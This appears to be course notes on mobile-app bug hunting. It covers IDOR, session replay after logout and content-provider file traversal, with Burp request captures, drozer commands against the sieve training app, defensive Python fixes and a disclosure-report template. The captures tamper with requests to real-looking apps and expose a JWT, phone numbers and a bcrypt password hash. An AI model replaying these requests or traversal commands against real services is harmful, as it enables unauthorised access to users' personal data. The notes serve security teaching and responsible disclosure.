
IDOR - Insecure Direct Object Reference

https://abc.com/userprofile?id=1234

The id parameter selects whose profile is returned. Two test accounts:

- asif -> https://abc.com/userprofile?id=1234
- Aman -> https://abc.com/userprofile?id=12345

Logged in as Aman, change id=12345 to id=1234 and resend. If asif's profile comes back, the server is choosing the record by the id parameter alone and never checks that the logged-in user owns it.

IDOR: the attacker is able to access, manipulate or modify an object through an id parameter they should not be allowed to use.

Access to unauthorized data: if an attacker can guess or increment the id parameter and read another user's data, it is an IDOR vulnerability.

PII (personally identifiable information) is the usual impact: name, email, mobile number, location of other users.

Burp capture from the test app. The request carries two identities: the JWT in user_token (its payload base64url-decodes to {"id":"9218","device_id":"7e9c09fd1166615"}) and a separate userid form field. The server picks the profile by userid, so user 9218's token with userid=9210 returns user 9210's profile.

POST /rajsacademy_app_ctrl/get_profile HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0; Phone Build/MRA58K)
Host: www.rajsacademy.com
Connection: close
Accept-Encoding: gzip, deflate
Content-Length: 163

user_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IjkyMTgiLCJkZXZpY2VfaWQiOiI3ZTljMDlmZDExNjY2MTUifQ.Z6aGWoYplx9GJ7yHmckG7iztOOM3V1p13gfjt98DMGw&userid=9210&

HTTP/1.1 200 OK
Date: Tue, 26 Sep 2023 13:41:45 GMT
Server: Apache/2.4.54 (Ubuntu)
Set-Cookie: ci_session=3f10pih9he4kdpulivlb7ctprupvpk4q; expires=Tue, 26-Sep-2023 15:41:45 GMT; Max-Age=7200; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 150
Connection: close
Content-Type: application/json

{"status":true,"message":"Success","image":"","name":"Aiswarya","location":"","mobile":"","email":"@gmail.com"}

Fix: take the user id from the verified token and reject (or ignore) a client-supplied userid that does not match it.
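The check described above, as an added example (not the page's or the test app's code). It mints and verifies an HS256 JWT with the same header as the captured token, then contrasts a handler that trusts the userid field (the IDOR) with one that trusts only the token subject. The HMAC secret, the two-user profile table and the token are constructed here so it runs offline.

```python
"""Added example: why get_profile is an IDOR and how the server should
decide whose profile to return. Secret and profile table are constructed."""
import base64
import hashlib
import hmac
import json
from urllib.parse import parse_qs

SECRET = b"demo-secret-not-the-real-one"   # assumption: server-side HMAC key

# Constructed sample data standing in for the app's user table.
PROFILES = {
    "9218": {"name": "Asif", "email": "asif@example.com"},
    "9210": {"name": "Aiswarya", "email": "aiswarya@example.com"},
}


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def make_token(user_id: str, device_id: str) -> str:
    """Mint an HS256 JWT shaped like the page's user_token."""
    header = _b64url(json.dumps({"typ": "JWT", "alg": "HS256"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps({"id": user_id, "device_id": device_id}, separators=(",", ":")).encode())
    sig = hmac.new(SECRET, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def verify_token(token: str) -> dict:
    """Return the payload only if alg is HS256 and the signature matches."""
    try:
        h, p, s = token.split(".")
    except ValueError:
        raise PermissionError("malformed token")
    if json.loads(_b64url_decode(h)).get("alg") != "HS256":
        raise PermissionError("unexpected alg")   # pin the algorithm server side
    expected = hmac.new(SECRET, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(s)):
        raise PermissionError("bad signature")
    return json.loads(_b64url_decode(p))


def get_profile_vulnerable(body: str) -> dict:
    """Mirrors the capture: the token is checked (authentication), but the
    record is selected by the client-supplied userid (no authorisation)."""
    form = parse_qs(body)
    verify_token(form["user_token"][0])
    return PROFILES[form["userid"][0]]


def get_profile_fixed(body: str) -> dict:
    """Fix: the subject comes from the verified token; a userid field, if the
    client still sends one, must match it or the request is rejected."""
    form = parse_qs(body)
    claims = verify_token(form["user_token"][0])
    requested = form.get("userid", [claims["id"]])[0]
    if requested != claims["id"]:
        raise PermissionError("userid does not match token subject")
    return PROFILES[claims["id"]]


def demo() -> tuple:
    """User 9218 asks for user 9210's profile, as in the captured request."""
    token = make_token("9218", "7e9c09fd1166615")
    body = f"user_token={token}&userid=9210&"
    leaked = get_profile_vulnerable(body)["name"]
    try:
        get_profile_fixed(body)
        fixed = "allowed"
    except PermissionError as e:
        fixed = str(e)
    return leaked, fixed


if __name__ == "__main__":
    print(demo())
```

The vulnerable handler does authenticate the caller; the bug is purely that the object reference comes from the request instead of the session. That distinction is what to write in the report's description.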

Severity: IDOR on its own - high.

OTP - raj app - also vulnerable (OTP bypass).

Chaining: OTP bypass + IDOR = account takeover - critical.

IDOR -> OTP bypass -> account takeover.

2020 - app - this kind of chain paid $2k.
Improper Session Handling

Test (Swiggy example): login, create a profile, change the name, logout.

Asif on Swiggy: change the name to asif1, logout, then replay the same edit request with the old session token, changing the name to asif123. If the server still accepts the token after logout and the name changes, the session is not invalidated server side.

Burp Suite capture from the test app (request replayed after logout):

POST /api/v2/edit_user HTTP/1.1
authkey: 123456
Content-Length: 302
Content-Type: application/x-www-form-urlencoded
Host: jaipursabjimandi.com
Connection: close
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

device_id=d0tHS7lyEMY%3AAPA91bFBIQt8Y2rYklzhykZZoSAdV1TeevLXcVH3JVfPOyhhtGa7OonoM2_NEDUogWuoyfEiXrvKhCzhfmVTpXt7-BonhM_vFtSeVBB6P39sQnB6XODJ21FrRH4BgU44fB4Vbf1gdmWm&device_type=android&user_id=12525&zipcode=665464&email=propubgking123%40gmail.com&username=null&full_name=asif123&phone_number=8676575676

HTTP/1.1 200 OK
date: Tue, 26 Sep 2023 13:49:12 GMT
server: Apache/2.4.41 (Ubuntu)
cache-control: no-cache, private
x-ratelimit-limit: 60
x-ratelimit-remaining: 59
vary: Accept-Encoding
content-length: 899
content-type: text/html; charset=UTF-8
connection: close

{"status":"success","message":"Your profile has been updated successfully.","data":{"id":"12525","user_role_id":"0","first_name":"","last_name":"","full_name":"asif123","slug":"test","username":null,"email":"propubgking123@gmail.com","phone_number":"8676575676","password":"$2y$10$j9aTuTnD7K3kxpM19rjsFunh48PQRrSlC99Hh4o1v1kiAbikpcEKS","image":"https:\/\/jaipursabjimandi.com\/img\/usr_img.png","is_verified":"0","is_active":"1","validate_string":"66731158181c5150bf4d6a5f59754678","forgot_password_validate_string":null,"verification_code":null,"is_deleted":"0","remember_token":null,"agent_code":"","created_at":"2023-09-26 18:24:24","updated_at":"2023-09-26 19:19:12","deleted_at":"0","device_type":"android","device_id":"d0tHS7lyEMY:APA91bFBIQt8Y2rYklzhykZZoSAdV1TeevLXcVH3JVfPOyhhtGa7OonoM2_NEDUogWuoyfEiXrvKhCzhfmVTpXt7-BonhM_vFtSeVBB6P39sQnB6XODJ21FrRH4BgU44fB4Vbf1gdmWm","zipcode":"665464"}}

The replay after logout returns 200 and full_name is updated to asif123, so logout only happened in the client; the authkey is still valid on the server. Note also that the response echoes the whole user record, including the bcrypt password hash and validate_string, which the client never needs. Report that as excessive data exposure alongside the session finding.
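The replay test from these notes, as an added example (not the page's or the app's code). VulnerableApp behaves like the capture: logout changes nothing on the server, so the old authkey keeps working. FixedApp deletes the session on logout and expires idle sessions, so the replayed edit_user gets 401. Users, the idle timeout and the clock are constructed assumptions.

```python
"""Added example: server-side session revocation that makes the
replay-after-logout test fail. User table and timeout are constructed."""
import secrets
import time


class VulnerableApp:
    """Logout is client-side only; the server never forgets the authkey."""

    def __init__(self):
        self.sessions = {}                        # authkey -> user_id
        self.users = {"12525": {"full_name": "asif"}}

    def login(self, user_id: str) -> str:
        authkey = secrets.token_urlsafe(32)       # random, unlike the capture's 123456
        self.sessions[authkey] = user_id
        return authkey

    def logout(self, authkey: str) -> None:
        pass                                      # nothing happens server side

    def edit_user(self, authkey: str, full_name: str) -> dict:
        user_id = self.sessions.get(authkey)
        if user_id is None:
            return {"status": 401}
        self.users[user_id]["full_name"] = full_name
        return {"status": 200, "full_name": full_name}


class FixedApp(VulnerableApp):
    """Logout deletes the session record; idle sessions are revoked too."""

    IDLE_TIMEOUT = 7200                            # seconds; assumption for the example

    def __init__(self, clock=time.time):
        super().__init__()
        self.clock = clock                         # injectable so expiry can be tested
        self.last_seen = {}                        # authkey -> last request time

    def login(self, user_id: str) -> str:
        authkey = super().login(user_id)
        self.last_seen[authkey] = self.clock()
        return authkey

    def logout(self, authkey: str) -> None:
        self.sessions.pop(authkey, None)           # server-side revocation
        self.last_seen.pop(authkey, None)

    def _authenticate(self, authkey: str):
        user_id = self.sessions.get(authkey)
        if user_id is None:
            return None
        if self.clock() - self.last_seen[authkey] > self.IDLE_TIMEOUT:
            self.logout(authkey)                   # expired: revoke, treat as anonymous
            return None
        self.last_seen[authkey] = self.clock()
        return user_id

    def edit_user(self, authkey: str, full_name: str) -> dict:
        user_id = self._authenticate(authkey)
        if user_id is None:
            return {"status": 401}
        self.users[user_id]["full_name"] = full_name
        return {"status": 200, "full_name": full_name}


def replay_after_logout(app: VulnerableApp) -> int:
    """The test from the notes: set name, logout, replay with the old authkey."""
    key = app.login("12525")
    app.edit_user(key, "asif1")
    app.logout(key)
    return app.edit_user(key, "asif123")["status"]   # 200 = vulnerable, 401 = fixed


if __name__ == "__main__":
    print("vulnerable:", replay_after_logout(VulnerableApp()))
    print("fixed:", replay_after_logout(FixedApp()))
```

Deleting the client's copy of the token is not logout; the server has to stop honouring it. The same applies to tokens that are signed rather than stored: they need a server-side denylist or a short lifetime plus refresh.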

Local File Inclusion (via an exported content provider)

Drozer
Application

Content providers exported by the app are the attack surface (check how many are exported: 1, 2, 3 ...).

Steps:
Getting the package name
Attack surface
Info for the provider
Finding the URIs
Scanning the URIs for traversal
Exploit
Report the vul/bug

Drozer commands (sieve is the deliberately vulnerable training app):

run app.package.list -f sieve
run app.package.attacksurface com.mwr.example.sieve
run app.provider.info -a com.mwr.example.sieve
run app.provider.finduri com.mwr.example.sieve
run scanner.provider.traversal -a com.mwr.example.sieve
run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/proc/cpuinfo

The last command reads /proc/cpuinfo: FileBackupProvider opens whatever path follows the authority, so any file the app itself can read can be pulled out by another app on the device.
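The check FileBackupProvider is missing, as an added example (not the page's, sieve's or drozer's code; written in Python like the other examples on this page, but the same logic belongs in the provider's openFile()). open_file_vulnerable() does what the provider on the page does; resolve_backup_path() confines every request to one base directory and rejects traversal, percent-encoded traversal, double encoding and NUL bytes. The authority is the one from the drozer command; the base directory and the sample URIs are constructed.

```python
"""Added example: path confinement for a file-backed content provider.
Base directory and sample URIs are constructed for the example."""
import os
from urllib.parse import unquote, urlparse

AUTHORITY = "com.mwr.example.sieve.FileBackupProvider"
# Assumption: the only directory a backup provider should ever serve from.
BASE_DIR = "/data/data/com.mwr.example.sieve/files"


def open_file_vulnerable(uri: str) -> str:
    """What the page's provider effectively does: URI path straight to the filesystem."""
    return urlparse(uri).path


def resolve_backup_path(uri: str, base_dir: str = BASE_DIR) -> str:
    """Return the absolute path to open, or raise PermissionError.

    Order matters: check the authority, percent-decode exactly once (a caller
    may send ../ as %2e%2e%2f), refuse anything still encoded, treat the path
    as relative to base_dir, normalise, then require it to stay inside.
    """
    parsed = urlparse(uri)
    if parsed.scheme != "content" or parsed.netloc != AUTHORITY:
        raise PermissionError("wrong authority")
    requested = unquote(parsed.path)
    if "%" in requested:
        raise PermissionError("double-encoded path")   # second layer of encoding
    if "\x00" in requested:
        raise PermissionError("NUL byte in path")
    relative = requested.lstrip("/")                   # never honour an absolute path
    if not relative:
        raise PermissionError("empty path")
    candidate = os.path.normpath(os.path.join(base_dir, relative))
    # normpath is string-only; on a real device also realpath() to defeat symlinks.
    if os.path.commonpath([base_dir, candidate]) != base_dir:
        raise PermissionError("path escapes base directory")
    return candidate


def classify(uri: str) -> str:
    """Human-readable verdict for a URI: the resolved path or the denial reason."""
    try:
        return resolve_backup_path(uri)
    except PermissionError as e:
        return f"DENIED: {e}"


if __name__ == "__main__":
    for u in [
        f"content://{AUTHORITY}/backup.db",
        f"content://{AUTHORITY}/proc/cpuinfo",
        f"content://{AUTHORITY}/../../../../proc/cpuinfo",
        f"content://{AUTHORITY}/%2e%2e%2f%2e%2e%2fproc%2fcpuinfo",
        f"content://{AUTHORITY}/%252e%252e%2fproc/cpuinfo",
    ]:
        print(open_file_vulnerable(u), "->", classify(u))
```

With the check in place, content://.../FileBackupProvider/proc/cpuinfo no longer means the kernel's /proc/cpuinfo; it means a (non-existent) file proc/cpuinfo inside the backup directory, which is exactly the behaviour scanner.provider.traversal should report as not vulnerable.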

Responsible Disclosure / vulnerability report

Vulnerability Name - e.g. IDOR

Vulnerable URL/App - http://abc.com/ or the app name and version

Description - what the vulnerability is and where it is

Steps to reproduce - the exact steps we took to find the bug, so the vendor can repeat them

Impact - what an attacker gains (e.g. other users' PII, account takeover)

POC - proof of concept: image/photo/video of the vulnerable request and response

Solution - the recommended fix

Project - Application
3 days

Report a minimum of 4 vulnerabilities in the assigned app.
Asif.apk - 12 vulnerabilities in total; at least 4 must be reported.

Minimum 4

Thecyberhost, name, index
